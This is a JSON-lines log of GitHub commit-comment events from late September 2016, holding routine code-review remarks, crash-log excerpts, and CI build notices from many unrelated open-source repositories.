{"id":"4613974987","type":"CommitCommentEvent","actor":{"login":"bitz-amar"},"repo":{"name":"bitz-amar/ProgrammingAssignment2"},"payload":{"comment":{"id":19163098,"position":8,"line":1,"path":"cachematrix.R","commit_id":"b4da6afa91f65a5d6873537a66eb0a1d65254d91","created_at":"2016-09-25T09:46:10Z","updated_at":"2016-09-25T09:46:10Z","body":"## Caching the Inverse of a Matrix:\r\n## Matrix inversion is usually a costly computation and there may be some \r\n## benefit to caching the inverse of a matrix rather than compute it repeatedly.\r\n## Below are a pair of functions that are used to create a special object that \r\n## stores a matrix and caches its inverse.\r\n\r\n## This function creates a special \"matrix\" object that can cache its inverse."}},"created_at":"2016-09-25T09:46:10Z"}
{"id":"4613976015","type":"CommitCommentEvent","actor":{"login":"mgudemann"},"repo":{"name":"cristina-david/cbmc"},"payload":{"comment":{"id":19163099,"position":91,"line":206,"path":"src/cbmc/bmc_cover.cpp","commit_id":"04f511ffdcd53ac094179bdb2580ecf9cf4c91b6","created_at":"2016-09-25T09:47:09Z","updated_at":"2016-09-25T09:47:09Z","body":"please add a \"statistics\" messaget message to get information like \"reduced from X to Y test cases\""}},"created_at":"2016-09-25T09:47:09Z"}
{"id":"4613976086","type":"CommitCommentEvent","actor":{"login":"Ondalf"},"repo":{"name":"ScreepsGamers/screeps.behaviour-action-pattern"},"payload":{"comment":{"id":19163100,"position":null,"line":null,"path":null,"commit_id":"b5b01be8c4c86ba8eee62f256f5eb2ce397ba037","created_at":"2016-09-25T09:47:13Z","updated_at":"2016-09-25T09:47:13Z","body":"contFilling not set. let contFIlling at line 27 fixed it."}},"created_at":"2016-09-25T09:47:13Z"}
{"id":"4613976198","type":"CommitCommentEvent","actor":{"login":"joakimk"},"repo":{"name":"rodrigues/toniq"},"payload":{"comment":{"id":19163101,"position":null,"line":null,"path":null,"commit_id":"4f822f9e2f8f750f5648fb0ae8e8b55878a03d08","created_at":"2016-09-25T09:47:19Z","updated_at":"2016-09-25T09:47:19Z","body":"Is this something we should change in Toniq for everyone? How is it different?"}},"created_at":"2016-09-25T09:47:19Z"}
{"id":"4613976718","type":"CommitCommentEvent","actor":{"login":"daurnimator"},"repo":{"name":"rockdaboot/libpsl"},"payload":{"comment":{"id":19163102,"position":75,"line":1748,"path":"src/psl.c","commit_id":"1baaacccd5e1349f12c32f57e4a5e7098525415c","created_at":"2016-09-25T09:47:45Z","updated_at":"2016-09-25T09:47:45Z","body":"Would 'u8_tolower' of a null byte be a null byte? and hence: you can just give it +1 to it's input length?"}},"created_at":"2016-09-25T09:47:45Z"}
{"id":"4613977243","type":"CommitCommentEvent","actor":{"login":"ChrisOelmueller"},"repo":{"name":"unknown-horizons/unknown-horizons"},"payload":{"comment":{"id":19163104,"position":5,"line":172,"path":"horizons/world/concreteobject.py","commit_id":"a8c03613eacc9e4685c439da0626624c82d7ad44","created_at":"2016-09-25T09:48:13Z","updated_at":"2016-09-25T09:48:13Z","body":"That was my question more or less. If python2 support is indeed about to be dropped, it'd certainly obfuscate what's going on a bit less than `list(list(…` does."}},"created_at":"2016-09-25T09:48:13Z"}
{"id":"4613977954","type":"CommitCommentEvent","actor":{"login":"ozzi-"},"repo":{"name":"ozzi-/steamgroupwidget"},"payload":{"comment":{"id":19163105,"position":40,"line":29,"path":"steamgroup.php","commit_id":"7266973b8f2623dd698cf5719045902c7d90a0d3","created_at":"2016-09-25T09:48:51Z","updated_at":"2016-09-25T09:48:51Z","body":"THE KEY"}},"created_at":"2016-09-25T09:48:51Z"}
{"id":"4613978658","type":"CommitCommentEvent","actor":{"login":"joakimk"},"repo":{"name":"safwank/toniq"},"payload":{"comment":{"id":19163107,"position":null,"line":null,"path":null,"commit_id":"3f12381ad5766ab9dcc5af3198ac7cf4f37937fe","created_at":"2016-09-25T09:49:29Z","updated_at":"2016-09-25T09:49:29Z","body":"Interesting. I haven't seen this kind of functionality in any job queue yet. Usually when I've needed something a bit like this it's to delay jobs until a certain time, e.g. \"run this job in 30 seconds\" or \"try again in 5 minutes\".\r\n\r\nHow do you use `Toniq.JobPersistence.move_suspended_job_to_incoming_jobs(job)` in your app?"}},"created_at":"2016-09-25T09:49:29Z"}
{"id":"4613979238","type":"CommitCommentEvent","actor":{"login":"arn354"},"repo":{"name":"oe-alliance/e2openplugin-OpenWebif"},"payload":{"comment":{"id":19163108,"position":null,"line":null,"path":null,"commit_id":"18c4ac00f1e998d3c2f765a6b8f0eefc4ccfa0fb","created_at":"2016-09-25T09:50:00Z","updated_at":"2016-09-25T09:50:00Z","body":"11:35:11.5042 [   ] service/servicedvbrecord.cpp:190 stop [eDVBServiceRecord] stop recording!\r\n11:35:11.5043 [ E ] service/servicedvbrecord.cpp:569 saveCutlist [eDVBServiceRecord] saving cutlist failed because tstools failed\r\n11:35:11.5053 {   } Components/Sources/StreamService.py:28 recordEvent RECORD event for us: <enigma.iRecordableServicePtr; proxy of <Swig Object of type 'ePtr< iRecordableService > *' at 0x706a8590> >\r\n11:35:11.5086 {   } Components/Sources/StreamService.py:28 recordEvent RECORD event for us: <enigma.iRecordableServicePtr; proxy of <Swig Object of type 'ePtr< iRecordableService > *' at 0x706a8590> >\r\n11:35:11.5109 [   ] dvb/cahandler.cpp:329 unregisterService [eDVBCAService] free slot 0 demux 0 for service 1:0:19:283D:3FB:1:C00000:0:0:0:\r\n11:35:11.5110 [   ] dvb/cahandler.cpp:578 buildCAPMT [eDVBCAService] don't build/send the same CA PMT twice\r\n11:35:11.5134 { E } /usr/lib/python2.7/site-packages/twisted/logger/_file.py:66 __call__ Unhandled error in Deferred:\r\n11:35:11.5267 { E } /usr/lib/python2.7/site-packages/twisted/logger/_file.py:66 __call__ \r\n\r\nTraceback (most recent call last):\r\nFailure: twisted.internet.error.ConnectionLost: Connection to the other side was lost in a non-clean fashion.\r\n\r\nsome mor information from log before the crash happens."}},"created_at":"2016-09-25T09:50:00Z"}
{"id":"4613980627","type":"CommitCommentEvent","actor":{"login":"joakimk"},"repo":{"name":"safwank/toniq"},"payload":{"comment":{"id":19163109,"position":4,"line":24,"path":"lib/toniq.ex","commit_id":"3f12381ad5766ab9dcc5af3198ac7cf4f37937fe","created_at":"2016-09-25T09:51:10Z","updated_at":"2016-09-25T09:51:10Z","body":"If we end up merging this into Toniq later on I'd want this to explain what a suspended queue is :)"}},"created_at":"2016-09-25T09:51:10Z"}
{"id":"4613981277","type":"CommitCommentEvent","actor":{"login":"mgudemann"},"repo":{"name":"cristina-david/cbmc"},"payload":{"comment":{"id":19163110,"position":88,"line":203,"path":"src/cbmc/bmc_cover.cpp","commit_id":"04f511ffdcd53ac094179bdb2580ecf9cf4c91b6","created_at":"2016-09-25T09:51:46Z","updated_at":"2016-09-25T09:51:46Z","body":"ok to do this for sorting, but we then lose this information in the generated tests, i.e., coverage for tests will be underreported in the comments there"}},"created_at":"2016-09-25T09:51:46Z"}
{"id":"4613982164","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimGeometry"},"payload":{"comment":{"id":19163111,"position":null,"line":null,"path":null,"commit_id":"a55d15b40cfe935c313bfb923117e8c2cfec147c","created_at":"2016-09-25T09:52:40Z","updated_at":"2016-09-25T09:52:40Z","body":"TeamCity Xbim :: Xbim Geometry :: XbimGeometry [Build 269](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1233&buildTypeId=Xbim_XbimGeometry_XbimGeometry) is now running\n"}},"created_at":"2016-09-25T09:52:40Z"}
{"id":"4613982263","type":"CommitCommentEvent","actor":{"login":"joakimk"},"repo":{"name":"safwank/toniq"},"payload":{"comment":{"id":19163112,"position":58,"line":129,"path":"lib/toniq/job_persistence.ex","commit_id":"3f12381ad5766ab9dcc5af3198ac7cf4f37937fe","created_at":"2016-09-25T09:52:46Z","updated_at":"2016-09-25T09:52:46Z","body":"Looks really good and consistent with the existing code! 👍 "}},"created_at":"2016-09-25T09:52:46Z"}
{"id":"4613982386","type":"CommitCommentEvent","actor":{"login":"Schimmelreiter"},"repo":{"name":"oe-alliance/e2openplugin-OpenWebif"},"payload":{"comment":{"id":19163113,"position":null,"line":null,"path":null,"commit_id":"18c4ac00f1e998d3c2f765a6b8f0eefc4ccfa0fb","created_at":"2016-09-25T09:52:51Z","updated_at":"2016-09-25T09:52:51Z","body":"Nah, don't.\r\nLet Rob or plnick solve it.\r\n\r\nRob as our master developer should be able to handle this within 5 minutes."}},"created_at":"2016-09-25T09:52:51Z"}
{"id":"4613982847","type":"CommitCommentEvent","actor":{"login":"Ondalf"},"repo":{"name":"ScreepsGamers/screeps.behaviour-action-pattern"},"payload":{"comment":{"id":19163114,"position":null,"line":null,"path":null,"commit_id":"3ddee8d897efc8267a5250caeff8080719cf277a","created_at":"2016-09-25T09:53:17Z","updated_at":"2016-09-25T09:53:17Z","body":"Room.adjacentRooms -- let x, y; otherwise errors."}},"created_at":"2016-09-25T09:53:17Z"}
{"id":"4613982918","type":"CommitCommentEvent","actor":{"login":"Ondalf"},"repo":{"name":"ScreepsGamers/screeps.behaviour-action-pattern"},"payload":{"comment":{"id":19163115,"position":null,"line":null,"path":null,"commit_id":"b1cbe4fb362a32dccaf795fd727e5787d57c66f2","created_at":"2016-09-25T09:53:21Z","updated_at":"2016-09-25T09:53:21Z","body":"Room.validFields -- let x, y; otherwise errors."}},"created_at":"2016-09-25T09:53:21Z"}
{"id":"4613983815","type":"CommitCommentEvent","actor":{"login":"arn354"},"repo":{"name":"oe-alliance/e2openplugin-OpenWebif"},"payload":{"comment":{"id":19163118,"position":null,"line":null,"path":null,"commit_id":"18c4ac00f1e998d3c2f765a6b8f0eefc4ccfa0fb","created_at":"2016-09-25T09:54:07Z","updated_at":"2016-09-25T09:54:07Z","body":"plnick will not have it as it will take ages untill vu/vti updates oe or twisted :)"}},"created_at":"2016-09-25T09:54:07Z"}
{"id":"4613984129","type":"CommitCommentEvent","actor":{"login":"nikswamy"},"repo":{"name":"FStarLang/FStar"},"payload":{"comment":{"id":19163119,"position":null,"line":null,"path":null,"commit_id":"0ef39dd5699292e66589a78d723932592184f691","created_at":"2016-09-25T09:54:20Z","updated_at":"2016-09-25T09:54:20Z","body":"Very confused by why a streak of commits including this one appears twice on master. \r\n\r\nSee also 7eeea439eae73bc70b7e16819bc70267a9ea9315\r\n\r\nCan a git wizard shed some light? @msprotz "}},"created_at":"2016-09-25T09:54:20Z"}
{"id":"4613985894","type":"CommitCommentEvent","actor":{"login":"Konard"},"repo":{"name":"Konard/LinksPlatform"},"payload":{"comment":{"id":19163121,"position":6,"line":556,"path":"Platform/Platform.Data.Kernel/PersistentMemoryManager.c","commit_id":"8ba99f9080ebe1da11ccd2b6b3c5d4f30bc99746","created_at":"2016-09-25T09:55:56Z","updated_at":"2016-09-25T09:55:56Z","body":"signed and signed_integer are not the same types"}},"created_at":"2016-09-25T09:55:56Z"}
{"id":"4613985989","type":"CommitCommentEvent","actor":{"login":"mgudemann"},"repo":{"name":"cristina-david/cbmc"},"payload":{"comment":{"id":19163123,"position":52,"line":167,"path":"src/cbmc/bmc_cover.cpp","commit_id":"04f511ffdcd53ac094179bdb2580ecf9cf4c91b6","created_at":"2016-09-25T09:56:02Z","updated_at":"2016-09-25T09:56:02Z","body":"this seems to rely on the entries of the input vectors to be sorted, is this always the case?"}},"created_at":"2016-09-25T09:56:02Z"}
{"id":"4613987163","type":"CommitCommentEvent","actor":{"login":"xue1234jun"},"repo":{"name":"xue1234jun/hdapp"},"payload":{"comment":{"id":19163126,"position":null,"line":null,"path":null,"commit_id":"dbbf6491c048ec51dba863c2d5875984db911c38","created_at":"2016-09-25T09:57:09Z","updated_at":"2016-09-25T09:57:09Z","body":"1"}},"created_at":"2016-09-25T09:57:09Z"}
{"id":"4613988353","type":"CommitCommentEvent","actor":{"login":"Schimmelreiter"},"repo":{"name":"oe-alliance/e2openplugin-OpenWebif"},"payload":{"comment":{"id":19163127,"position":null,"line":null,"path":null,"commit_id":"18c4ac00f1e998d3c2f765a6b8f0eefc4ccfa0fb","created_at":"2016-09-25T09:58:18Z","updated_at":"2016-09-25T09:58:18Z","body":"Your last crashlog appears to be truncated ...\r\n"}},"created_at":"2016-09-25T09:58:18Z"}
{"id":"4613988368","type":"CommitCommentEvent","actor":{"login":"Konard"},"repo":{"name":"Konard/LinksPlatform"},"payload":{"comment":{"id":19163128,"position":13,"line":22,"path":"Platform/Platform.Data.Kernel/PersistentMemoryManager.h","commit_id":"8ba99f9080ebe1da11ccd2b6b3c5d4f30bc99746","created_at":"2016-09-25T09:58:20Z","updated_at":"2016-09-25T09:58:20Z","body":"If we continue to follow the https://github.com/Konard/LinksPlatform/wiki/Coding-conventions when it should be `char* ` instead of `char * `."}},"created_at":"2016-09-25T09:58:20Z"}
{"id":"4615181002","type":"CommitCommentEvent","actor":{"login":"brad0"},"repo":{"name":"lighttpd/lighttpd1.4"},"payload":{"comment":{"id":19166108,"position":null,"line":null,"path":null,"commit_id":"93afda9c8e6016dc132e6cac35a322be62b3cb03","created_at":"2016-09-26T00:00:56Z","updated_at":"2016-09-26T00:00:56Z","body":"This API also exists on FreeBSD 10.0+ and OpenBSD 5.7+."}},"created_at":"2016-09-26T00:00:56Z"}
{"id":"4615181157","type":"CommitCommentEvent","actor":{"login":"SleepSpace9"},"repo":{"name":"SleepSpace9/Nemisys"},"payload":{"comment":{"id":19166110,"position":null,"line":null,"path":null,"commit_id":"701e7d1683288f1b689bffb20b92ab624f63cd9d","created_at":"2016-09-26T00:01:02Z","updated_at":"2016-09-26T00:01:02Z","body":"Sorry, I added the missing import: https://github.com/SleepSpace9/Nemisys/commit/46674b3ed4ca862e6fcdb3b9d936dd8098031cc3"}},"created_at":"2016-09-26T00:01:02Z"}
{"id":"4615187343","type":"CommitCommentEvent","actor":{"login":"nmcspadden"},"repo":{"name":"facebook/IT-CPE"},"payload":{"comment":{"id":19166129,"position":null,"line":null,"path":null,"commit_id":"cfb8099379fa6d95515f95a1586ff258f5ed2339","created_at":"2016-09-26T00:04:58Z","updated_at":"2016-09-26T00:04:58Z","body":"No, but it's easy to fix.\n\nOn Sun, Sep 25, 2016 at 4:47 PM, cgerke <notifications@github.com> wrote:\n\n> Is this commit missing the cpe_init dependencies on purpose?\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/facebook/IT-CPE/commit/cfb8099379fa6d95515f95a1586ff258f5ed2339#commitcomment-19166017>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ABJZ36eFP6orq8NQ3TI7MpbV6uMJlvj2ks5qtwgggaJpZM4KGCgD>\n> .\n>\n\n\n\n-- \n--\nNick McSpadden\nnmcspadden@gmail.com\n"}},"created_at":"2016-09-26T00:04:58Z"}
{"id":"4615187630","type":"CommitCommentEvent","actor":{"login":"fclairamb"},"repo":{"name":"andrewarrow/paradise_ftp"},"payload":{"comment":{"id":19166132,"position":null,"line":null,"path":null,"commit_id":"a468505bea391a8db659d7b74eba86884a94aeac","created_at":"2016-09-26T00:05:11Z","updated_at":"2016-09-26T00:05:11Z","body":"Yes, I didn't like the randomness of it. If FinishAndStop is true, then it can take between 0s and 60s before it stops accepting connection.\r\n\r\nIt's easier to just kill the listening socket.\r\n\r\nI guess you wanted to keep the existing client active. But there's no problem here, if you keep your server running with the listening socket closed, the existing clients can still use their (already established) socket without any problem.\r\n\r\nI added the FtpServer::ClientDeparture method. In this one, we could easily set a flag or send something to channel to notify that there's no client connected anymore (empty map) so that if we are in this FinishAndStop mode, we can stop the server only when the flag is true.\r\n\r\nBut I think it's really some fine tuning, my primary goal is to completely finish the driver system and make it robust."}},"created_at":"2016-09-26T00:05:11Z"}
{"id":"4615189488","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19166137,"position":null,"line":null,"path":null,"commit_id":"e5f9183eedf598197dd6bd84568e021893a8eb5f","created_at":"2016-09-26T00:06:24Z","updated_at":"2016-09-26T00:06:24Z","body":"EMS (brianlball) - i386-Windows-7-VisualStudio-12: OK (2307 of 2497 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-e5f9183eedf598197dd6bd84568e021893a8eb5f-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-e5f9183eedf598197dd6bd84568e021893a8eb5f-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-92.39%25-yellow.svg)</a> \n"}},"created_at":"2016-09-26T00:06:24Z"}
{"id":"4615190361","type":"CommitCommentEvent","actor":{"login":"Samangan"},"repo":{"name":"Samangan/owLint"},"payload":{"comment":{"id":19166139,"position":null,"line":null,"path":null,"commit_id":"9d2344c387f6404813acf0f986d4146edacbcde2","created_at":"2016-09-26T00:07:03Z","updated_at":"2016-09-26T00:07:03Z","body":"hello wut"}},"created_at":"2016-09-26T00:07:03Z"}
{"id":"4615193303","type":"CommitCommentEvent","actor":{"login":"fcard"},"repo":{"name":"JuliaLang/METADATA.jl"},"payload":{"comment":{"id":19166154,"position":19,"line":19,"path":".test/check-pr.jl","commit_id":"fef1c469647c3b8000ef15bdf0d55035c4194fde","created_at":"2016-09-26T00:09:02Z","updated_at":"2016-09-26T00:09:02Z","body":"Oi, isn't this checking the `PkgName/url` file from new packages as well? The match for the tag version is returning `nothing` and crashing the tests. (https://travis-ci.org/JuliaLang/METADATA.jl/builds/162654943)"}},"created_at":"2016-09-26T00:09:02Z"}
{"id":"4615193374","type":"CommitCommentEvent","actor":{"login":"jleclanche"},"repo":{"name":"HearthSim/discord_rss_bot"},"payload":{"comment":{"id":19166156,"position":null,"line":null,"path":null,"commit_id":"dc86fd1fcb3a866c18b423268ceb7e352f2a553b","created_at":"2016-09-26T00:09:06Z","updated_at":"2016-09-26T00:09:06Z","body":"So?"}},"created_at":"2016-09-26T00:09:06Z"}
{"id":"4615196645","type":"CommitCommentEvent","actor":{"login":"QQ853695231"},"repo":{"name":"QQ853695231/IPPlugin"},"payload":{"comment":{"id":19166172,"position":null,"line":null,"path":null,"commit_id":"25ca210d9718f33dfc2c52d2336e59eec6c6c539","created_at":"2016-09-26T00:11:22Z","updated_at":"2016-09-26T00:11:22Z","body":"这个插件"}},"created_at":"2016-09-26T00:11:22Z"}
{"id":"4615199365","type":"CommitCommentEvent","actor":{"login":"bfwalton"},"repo":{"name":"YCPCS-481-TeamB/BaseballSim"},"payload":{"comment":{"id":19166176,"position":null,"line":null,"path":null,"commit_id":"cc85ad0a3cceff0f9120873b48b1636c39270829","created_at":"2016-09-26T00:13:20Z","updated_at":"2016-09-26T00:13:20Z","body":"Literally The worst way to do this"}},"created_at":"2016-09-26T00:13:20Z"}
{"id":"4615202714","type":"CommitCommentEvent","actor":{"login":"eahrold"},"repo":{"name":"eahrold/AHKeychain"},"payload":{"comment":{"id":19166187,"position":6,"line":68,"path":"AHKeychain/AHKeychain.m","commit_id":"5addf1ff8a173fbeab15264e6317bb599bf0b330","created_at":"2016-09-26T00:15:42Z","updated_at":"2016-09-26T00:15:42Z","body":"https://developer.apple.com/reference/foundation/nsfoundationversionnumber10_11_max"}},"created_at":"2016-09-26T00:15:42Z"}
{"id":"4615209612","type":"CommitCommentEvent","actor":{"login":"toranb"},"repo":{"name":"toranb/ember-redux-ddau-example"},"payload":{"comment":{"id":19166196,"position":34,"line":35,"path":"app/router.js","commit_id":"76dfce3956a508724ed958142e2fe4bc85167d5a","created_at":"2016-09-26T00:20:27Z","updated_at":"2016-09-26T00:20:27Z","body":"Ah, I like this! I'll need to rework this using the `routerDidTransition` like you suggest!"}},"created_at":"2016-09-26T00:20:27Z"}
{"id":"4615209772","type":"CommitCommentEvent","actor":{"login":"kdmathis"},"repo":{"name":"kdmathis/auto-journey"},"payload":{"comment":{"id":19166197,"position":null,"line":null,"path":null,"commit_id":"1f9ec13de86e10fcee0b38c587d1b4f8ad5e640f","created_at":"2016-09-26T00:20:34Z","updated_at":"2016-09-26T00:20:34Z","body":"first readme file."}},"created_at":"2016-09-26T00:20:34Z"}
{"id":"4615211204","type":"CommitCommentEvent","actor":{"login":"OwnageIsMagic"},"repo":{"name":"VkOpt/VkOpt"},"payload":{"comment":{"id":19166199,"position":null,"line":null,"path":null,"commit_id":"98d0f8164ba95a66e13df8dcdb982ba86af0126d","created_at":"2016-09-26T00:21:35Z","updated_at":"2016-09-26T00:21:35Z","body":"покликай сами кнопки, ЯД говорит что такого кошелька нет"}},"created_at":"2016-09-26T00:21:35Z"}
{"id":"4615213394","type":"CommitCommentEvent","actor":{"login":"njlindsey"},"repo":{"name":"njlindsey/_EPS298"},"payload":{"comment":{"id":19166200,"position":null,"line":null,"path":null,"commit_id":"6dec3797ce32febd9b40ff46949108b2c3dd23d7","created_at":"2016-09-26T00:23:05Z","updated_at":"2016-09-26T00:23:05Z","body":"Too simple...no extendable to any additional rays (only t=px+nz)"}},"created_at":"2016-09-26T00:23:05Z"}
{"id":"4615214513","type":"CommitCommentEvent","actor":{"login":"KiberInfinity"},"repo":{"name":"VkOpt/VkOpt"},"payload":{"comment":{"id":19166204,"position":null,"line":null,"path":null,"commit_id":"98d0f8164ba95a66e13df8dcdb982ba86af0126d","created_at":"2016-09-26T00:23:55Z","updated_at":"2016-09-26T00:23:55Z","body":"первый раз - ошибка, второй раз - всё нормально"}},"created_at":"2016-09-26T00:23:55Z"}
{"id":"4615214527","type":"CommitCommentEvent","actor":{"login":"pyanodon"},"repo":{"name":"pyanodon/pYCoalprocesing"},"payload":{"comment":{"id":19166205,"position":5,"line":16,"path":"prototypes/fluids/dirty-water.lua","commit_id":"d61695371022427092da1e1c90b903a0e8aae1e7","created_at":"2016-09-26T00:23:56Z","updated_at":"2016-09-26T00:23:56Z","body":"I changed because the tailings are being filled way too fast. In a matter of 4 minutes, one tailing pond was filled up. The technology to reuse the tailings water will come only in blue science tier. So, we can increase the amount the tailings-pond can hold and also drain over time (after max filled) polluting around."}},"created_at":"2016-09-26T00:23:56Z"}
{"id":"4615215682","type":"CommitCommentEvent","actor":{"login":"alandekok"},"repo":{"name":"FreeRADIUS/freeradius-server"},"payload":{"comment":{"id":19166210,"position":null,"line":null,"path":null,"commit_id":"461cfc3bafd36525eec95ea0abb6119205a59382","created_at":"2016-09-26T00:24:50Z","updated_at":"2016-09-26T00:24:50Z","body":"On general principle, inventing *complex* configurations like this is wrong.  It's one thing to set a default boolean to `true` or `false`.  Or setting the default RADIUS port.  It is entirely different to set a default IP address.\r\n\r\nAnd forcing v4?  Why not v6?  Why not both?\r\n\r\nThere's a reason this was disallowed in 3.0.  It will similarly be disallowed once I finish the new transports.  I'm inclined to revert this back to the previous commit, too.\r\n\r\nThere is just no good reason for this."}},"created_at":"2016-09-26T00:24:50Z"}
{"id":"4615216299","type":"CommitCommentEvent","actor":{"login":"ChristopherAlexiev"},"repo":{"name":"ChristopherAlexiev/ICS4U"},"payload":{"comment":{"id":19166213,"position":28,"line":28,"path":"Unit One/src/com/bayviewglen/queens/Board.java","commit_id":"2fe8c9bf13c8eb3076d9130cd745fe364540e2ab","created_at":"2016-09-26T00:25:17Z","updated_at":"2016-09-26T00:25:17Z","body":"Hence it won't work either way."}},"created_at":"2016-09-26T00:25:17Z"}
{"id":"4615216695","type":"CommitCommentEvent","actor":{"login":"OwnageIsMagic"},"repo":{"name":"VkOpt/VkOpt"},"payload":{"comment":{"id":19166217,"position":null,"line":null,"path":null,"commit_id":"98d0f8164ba95a66e13df8dcdb982ba86af0126d","created_at":"2016-09-26T00:25:35Z","updated_at":"2016-09-26T00:25:35Z","body":"ты их просто для вида повесил? )"}},"created_at":"2016-09-26T00:25:35Z"}
{"id":"4615218108","type":"CommitCommentEvent","actor":{"login":"dmayer"},"repo":{"name":"tomekr/idb"},"payload":{"comment":{"id":19166221,"position":4,"line":8,"path":"lib/lib/device.rb","commit_id":"734e0fed1320bc8321948dc487a41edad1774f8a","created_at":"2016-09-26T00:26:38Z","updated_at":"2016-09-26T00:26:38Z","body":"If this is only a dev requirement, people will run into problems when you require `pry`, right?"}},"created_at":"2016-09-26T00:26:38Z"}
{"id":"4615218346","type":"CommitCommentEvent","actor":{"login":"chinadragon0515"},"repo":{"name":"OData/RESTier"},"payload":{"comment":{"id":19166222,"position":69,"line":149,"path":"src/Microsoft.Restier.Publishers.OData/Routing/HttpConfigurationExtensions.cs","commit_id":"3d7a54cbaeca852b7581611c22d4bad5ee9c8045","created_at":"2016-09-26T00:26:48Z","updated_at":"2016-09-26T00:26:48Z","body":"Yes, this is the issue.\r\n\r\nNot sure why UT can pass the test.\r\nI open the issue to track,"}},"created_at":"2016-09-26T00:26:48Z"}
{"id":"4615219466","type":"CommitCommentEvent","actor":{"login":"dmayer"},"repo":{"name":"tomekr/idb"},"payload":{"comment":{"id":19166225,"position":73,"line":79,"path":"lib/lib/app.rb","commit_id":"734e0fed1320bc8321948dc487a41edad1774f8a","created_at":"2016-09-26T00:27:40Z","updated_at":"2016-09-26T00:27:40Z","body":"Just noticed i say iOS 6 here, but I guess its really for an older arm architecture.. not important though."}},"created_at":"2016-09-26T00:27:40Z"}
{"id":"4615220510","type":"CommitCommentEvent","actor":{"login":"ChristopherAlexiev"},"repo":{"name":"ChristopherAlexiev/ICS4U"},"payload":{"comment":{"id":19166226,"position":28,"line":28,"path":"Unit One/src/com/bayviewglen/queens/Board.java","commit_id":"2fe8c9bf13c8eb3076d9130cd745fe364540e2ab","created_at":"2016-09-26T00:28:23Z","updated_at":"2016-09-26T00:28:23Z","body":"If I am trying to get to Morocco and I get on a plane without engines I won't get anywhere. If I get on a plane without a vertical stabilizer, it might take off but it would crash very shortly. Either way I didn't get to Morocco, hence it won't work either way and both are important."}},"created_at":"2016-09-26T00:28:23Z"}
{"id":"4615221206","type":"CommitCommentEvent","actor":{"login":"ararslan"},"repo":{"name":"JuliaLang/METADATA.jl"},"payload":{"comment":{"id":19166228,"position":19,"line":19,"path":".test/check-pr.jl","commit_id":"fef1c469647c3b8000ef15bdf0d55035c4194fde","created_at":"2016-09-26T00:28:53Z","updated_at":"2016-09-26T00:28:53Z","body":"Yeah, a PR to fix this will be up momentarily"}},"created_at":"2016-09-26T00:28:53Z"}
{"id":"4615221724","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"19smitgr/19smitgr.github.io"},"payload":{"comment":{"id":19166230,"position":null,"line":null,"path":null,"commit_id":"0938d2b2bc466877c39deac57cd4baaffcd67313","created_at":"2016-09-26T00:29:15Z","updated_at":"2016-09-26T00:29:15Z","body":"I know that now...\n\nOn Sun, Sep 25, 2016 at 7:56 PM, Garrett Smith <notifications@github.com>\nwrote:\n\n> I only made the README.md today.\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/19smitgr/19smitgr.github.io/commit/0938d2b2bc466877c39deac57cd4baaffcd67313#commitcomment-19166077>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AQMOnTQ1KsteIL4NY2mzUVwZ0Tl1tl0Sks5qtwpBgaJpZM4KGBLU>\n> .\n>\n"}},"created_at":"2016-09-26T00:29:15Z"}
{"id":"4615223916","type":"CommitCommentEvent","actor":{"login":"dmayer"},"repo":{"name":"tomekr/idb"},"payload":{"comment":{"id":19166235,"position":56,"line":283,"path":"lib/lib/device.rb","commit_id":"734e0fed1320bc8321948dc487a41edad1774f8a","created_at":"2016-09-26T00:30:43Z","updated_at":"2016-09-26T00:30:43Z","body":"its just copying a custom binary to the device, so that it can be run later? Not sure what you are unsure about :)"}},"created_at":"2016-09-26T00:30:43Z"}
{"id":"4615229109","type":"CommitCommentEvent","actor":{"login":"dmayer"},"repo":{"name":"tomekr/idb"},"payload":{"comment":{"id":19166244,"position":null,"line":null,"path":null,"commit_id":"734e0fed1320bc8321948dc487a41edad1774f8a","created_at":"2016-09-26T00:34:13Z","updated_at":"2016-09-26T00:34:13Z","body":"Your changes seem fine and leaned up some stuff as well :) Thanks! \r\n\r\nIs the iOS version detection in the pull request you based this off of sane? I didn't look at iOS 9.3.3 yet, so not sure if it works just from code. \r\n\r\nIf so, send a PR and I'll merge it! And release a new gem"}},"created_at":"2016-09-26T00:34:13Z"}
{"id":"4615230124","type":"CommitCommentEvent","actor":{"login":"tokudu"},"repo":{"name":"umano/AndroidSlidingUpPanel"},"payload":{"comment":{"id":19166245,"position":null,"line":null,"path":null,"commit_id":"384fefd4510224d4d2b6e9baf36bbb4e112962d8","created_at":"2016-09-26T00:34:56Z","updated_at":"2016-09-26T00:34:56Z","body":"Interesting. I'll look into an alternative.\n\nAnton\n\nOn Sun, Sep 25, 2016 at 2:05 PM, Matungos <notifications@github.com> wrote:\n\n> ViewCompat is not a replacement for nineoldandroids.\n>\n> ViewCompat.setTranslationY doesn't do anything in APIs below 11:\n> https://developer.android.com/reference/android/support/v4/\n> view/ViewCompat.html#setTranslationY(android.view.View, float)\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/umano/AndroidSlidingUpPanel/commit/384fefd4510224d4d2b6e9baf36bbb4e112962d8#commitcomment-19165381>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AAJP_tDc88dqBPjvzj1XwZbM32za8PWTks5qtuIdgaJpZM4KGAP4>\n> .\n>\n"}},"created_at":"2016-09-26T00:34:56Z"}
